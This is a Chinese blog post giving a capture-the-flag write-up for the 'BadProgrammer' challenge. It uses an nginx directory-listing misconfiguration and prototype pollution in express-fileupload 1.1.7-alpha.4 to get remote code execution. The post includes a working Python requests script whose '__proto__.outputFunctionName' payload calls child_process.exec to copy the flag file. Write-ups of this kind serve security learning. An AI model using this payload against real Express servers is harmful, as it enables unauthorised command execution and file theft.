当前位置: 首页 > news >正文

攻防世界-BadProgrammer

news 来源:原创 2025/5/31 18:11:51

进入环境

查看源代码进行分析

把源代码复制到Visual里面进行分析

发现静态文件存放在/static/目录下

观察请求response header发现是nginx服务器加express框架

利用nginx配置错误,可以列目录

得到app.js源码

查看package.json文件

发现express-fileupload版本为1.1.7-alpha.4

进行污染获取文件信息

import requestsresp1 = requests.post("http://{}:{}/{}".format('223.112.5.141', '61286', '4_pATh_y0u_CaNN07_Gu3ss'),files={'__proto__.outputFunctionName': (None, "x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x".format(cmd='cp /flag.txt /app/static/js/flag.txt'))})
print(resp1)

具体可参考@愚公搬代码

进行访问

http://223.112.5.141:61286/static/js/flag.txt

得到flag

相关文章:

  • Spring AI MCP的几个小问题
  • Python训练营打卡 Day39
  • 【博客系统】博客系统第十一弹:从零开始在 Linux 系统上搭建 Java 部署环境并部署 Web 项目
  • while循环
  • java上机测试错题回顾(4)
  • MC0309魔法项链
  • 从微积分到集合论(1630-1910)(历史简介)——第3章——数学分析的出现及其基础性进展(1780-1880)(I.Grattan-Guinness)
  • 65常用控件_QListWidget的使用
  • C++ 判断文件的编码类型
  • 如何选择适合团队的项目管理工具
  • 【AI News | 20250529】每日AI进展
  • 人工智能-训练AI模型涉及多个步骤
  • 从Homebrew找到openssl.cnf文件并拷贝到Go项目下使用
  • NC52 有效括号序列【牛客网】
  • [9-2] USART串口外设 江协科技学习笔记(9个知识点)
  • 每日算法-250529
  • 车载摄像头选型相关
  • 自定义异常小练习
  • QSS 使用方式介绍
  • cf2067A
  • 网站后台怎么更新网站/天津seo优化排名
  • 邯郸网站建设的企业/免费涨热度软件
  • 开发平台技术创新联盟/南京百度快速排名优化
  • WordPress+百度+主动/seo引擎优化工具
  • 免费的网站搭建平台/北京关键词seo
  • 盘锦网站建设价位/站长之家seo一点询